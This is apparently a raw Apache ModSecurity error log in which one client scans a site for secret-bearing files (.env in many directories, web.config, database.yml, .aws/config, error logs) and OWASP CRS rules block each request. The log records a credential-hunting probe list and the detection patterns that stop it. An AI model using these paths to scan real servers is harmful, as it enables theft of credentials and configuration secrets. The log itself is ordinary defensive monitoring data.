[Sat Nov 29 10:52:15.232635 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSrCT3HF7XN8-DkqegVy9gAAAAQ"]
[Sat Nov 29 10:52:15.232988 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSrCT3HF7XN8-DkqegVy9gAAAAQ"]
[Sat Nov 29 10:52:15.233183 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSrCT3HF7XN8-DkqegVy9gAAAAQ"]
[Sat Nov 29 10:52:15.683277 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSrCT1zUmGeGPC4NGsL9zwAAAAY"]
[Sat Nov 29 10:52:15.683622 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSrCT1zUmGeGPC4NGsL9zwAAAAY"]
[Sat Nov 29 10:52:15.683805 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSrCT1zUmGeGPC4NGsL9zwAAAAY"]
[Sat Nov 29 10:52:16.332197 2025] [authz_core:error] [pid 398572] [client 3.8.164.39:43082] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sat Nov 29 10:52:16.519166 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSrCUHHF7XN8-DkqegVy9wAAAAQ"]
[Sat Nov 29 10:52:16.519394 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSrCUHHF7XN8-DkqegVy9wAAAAQ"]
[Sat Nov 29 10:52:16.519591 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSrCUHHF7XN8-DkqegVy9wAAAAQ"]
[Sat Nov 29 10:52:16.753148 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSrCUBuHESEEqrci5wSNogAAAAw"]
[Sat Nov 29 10:52:16.753473 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSrCUBuHESEEqrci5wSNogAAAAw"]
[Sat Nov 29 10:52:16.753703 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSrCUBuHESEEqrci5wSNogAAAAw"]
[Sat Nov 29 10:52:17.007184 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90QAAAAY"]
[Sat Nov 29 10:52:17.007405 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90QAAAAY"]
[Sat Nov 29 10:52:17.007586 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90QAAAAY"]
[Sat Nov 29 10:52:17.347089 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90gAAAAY"]
[Sat Nov 29 10:52:17.347316 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90gAAAAY"]
[Sat Nov 29 10:52:17.347514 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90gAAAAY"]
[Sat Nov 29 10:52:17.573037 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSrCURuHESEEqrci5wSNowAAAAw"]
[Sat Nov 29 10:52:17.573307 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSrCURuHESEEqrci5wSNowAAAAw"]
[Sat Nov 29 10:52:17.573480 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSrCURuHESEEqrci5wSNowAAAAw"]
[Sat Nov 29 10:52:17.757468 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90wAAAAY"]
[Sat Nov 29 10:52:17.757694 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90wAAAAY"]
[Sat Nov 29 10:52:17.757873 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSrCUVzUmGeGPC4NGsL90wAAAAY"]
[Sat Nov 29 10:52:17.998144 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSrCURuHESEEqrci5wSNpAAAAAw"]
[Sat Nov 29 10:52:17.998387 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSrCURuHESEEqrci5wSNpAAAAAw"]
[Sat Nov 29 10:52:17.998581 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSrCURuHESEEqrci5wSNpAAAAAw"]
[Sat Nov 29 10:52:18.303863 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSrCUnHF7XN8-DkqegVy-AAAAAQ"]
[Sat Nov 29 10:52:18.304738 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSrCUnHF7XN8-DkqegVy-AAAAAQ"]
[Sat Nov 29 10:52:18.304984 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSrCUnHF7XN8-DkqegVy-AAAAAQ"]
[Sat Nov 29 10:52:18.777263 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSrCUlzUmGeGPC4NGsL91AAAAAY"]
[Sat Nov 29 10:52:18.777440 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSrCUlzUmGeGPC4NGsL91AAAAAY"]
[Sat Nov 29 10:52:18.777649 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSrCUlzUmGeGPC4NGsL91AAAAAY"]
[Sat Nov 29 10:52:18.777852 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSrCUlzUmGeGPC4NGsL91AAAAAY"]
[Sat Nov 29 10:52:19.038614 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSrCUxuHESEEqrci5wSNpgAAAAw"]
[Sat Nov 29 10:52:19.038953 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSrCUxuHESEEqrci5wSNpgAAAAw"]
[Sat Nov 29 10:52:19.039191 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSrCUxuHESEEqrci5wSNpgAAAAw"]
[Sat Nov 29 10:52:19.692686 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSrCUxuHESEEqrci5wSNpwAAAAw"]
